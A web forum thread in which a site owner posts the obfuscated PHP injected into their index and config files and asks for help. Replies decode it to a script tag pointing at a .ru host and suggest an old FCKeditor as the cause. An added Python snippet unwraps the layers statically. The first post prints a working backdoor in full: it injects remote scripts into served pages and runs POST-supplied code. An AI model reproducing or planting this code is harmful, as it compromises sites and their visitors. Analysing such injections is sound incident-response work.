
Have been hacked--pls help


tkm


Hello Friends,

Need your help desperately. My site has just been hacked. Someone has put the following javascript code in my index file, config file.

 

Code:

eval(base64_decode('aWYoIWlzc2V0KCRkMGpuMSkpe2Z1bmN0aW9uIGQwam4oJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNj  cmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYp  KT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVn  X21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwn  ZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFte  Pl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxz  Kj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9  cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNl  KCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMXZZbmxrYVdOcmNtOWpheTV5ZFM5b2IzQmxMM2xo  Ym1SbGVGODJObUUzT1RjelpqWmxZV1k1WW1FNUxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxi  b2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkk  cy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBkMGpuMigkYSwkYiwkYywkZCl7Z2xvYmFsICRkMGpuMTskcz1hcnJheSgpO2lmKGZ1  bmN0aW9uX2V4aXN0cygkZDBqbjEpKWNhbGxfdXNlcl9mdW5jKCRkMGpuMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0  YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdkMGpuJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJyli  cmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRz  KS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2Qwam4n  KTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kZDBqbmw9  KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2Qwam4yJykpIT0nZDBqbjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1Rb  J2UnXSkpOw==')); ?>

I have XSS injection blocking code for all my inputs. Not sure at all how this has happened. Any help would be greatly appreciated. Thanks.

 


Can't speculate as to how they got it in there, but if you decode all that, there's a script tag trying to include "http://mobydickrock.ru/hope/yandex_66a7973f6eaf9ba9.php". My Russian isn't exactly fluent, but from visiting mobydickrock.ru it just looks like some kind of normal rock music website. Can't see them wanting to/intentionally doing this to you. Perhaps run your site through some security tools and see if they pick up on any vulnerabilities so you could prevent this from happening again.

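A way to do the decoding described in the reply above without running the injected PHP, as an added example that is not part of the original thread: it statically peels nested `base64_decode` literals and reports embedded URLs and request-driven `eval`. The sample input, the placeholder URL and all function names are constructed for illustration.

```python
import base64
import re

# Quoted base64 literal passed to base64_decode(); whitespace inside the literal
# is allowed because forum and editor rendering often inserts it.
LITERAL = re.compile(r"""base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1""")
URL = re.compile(r"""https?://[^\s'"<>]+""")
REMOTE_EVAL = re.compile(r"eval\s*\(.*\$_(POST|GET|REQUEST|COOKIE)")


def b64(text):
    """Decode a base64 literal after stripping embedded whitespace."""
    compact = re.sub(r"\s+", "", text)
    compact += "=" * (-len(compact) % 4)
    return base64.b64decode(compact).decode("utf-8", "replace")


def unwrap(source, max_depth=5):
    """Return each decoded layer as text. Nothing is ever executed."""
    layers, queue = [], [(m.group(2), 1) for m in LITERAL.finditer(source)]
    while queue:
        blob, depth = queue.pop(0)
        try:
            decoded = b64(blob)
        except ValueError:  # binascii.Error is a ValueError: not valid base64
            continue
        layers.append(decoded)
        if depth < max_depth:
            queue += [(m.group(2), depth + 1) for m in LITERAL.finditer(decoded)]
    return layers


def triage(source):
    """Summarise the injected code for incident notes."""
    layers = unwrap(source)
    text = "\n".join(layers)
    return {
        "layers": len(layers),
        "urls": sorted(set(URL.findall(text))),
        "remote_eval": bool(REMOTE_EVAL.search(text)),  # runs request-supplied code
        "output_hook": "ob_start" in text,  # rewrites pages as they are served
    }


# Constructed sample (not the blob from the post), placeholder URL.
_tag = base64.b64encode(b'<script src="http://example.invalid/x.php"></script>').decode()
_php = "ob_start('h');$a=base64_decode('%s');eval(base64_decode($_POST['e']));" % _tag
SAMPLE = "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(_php.encode()).decode()
```

Run `triage()` over the contents of each modified file; a `remote_eval` hit means the file has to be treated as a backdoor, not only as a script injector.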

  • 2 weeks later...

I have heard of this recently. If you have an old version of FCKeditor, that could be a cause. There are also numerous other ways to do it too. More likely this vulnerability was something that you did not do, but third-party software. Any thoughts on that?
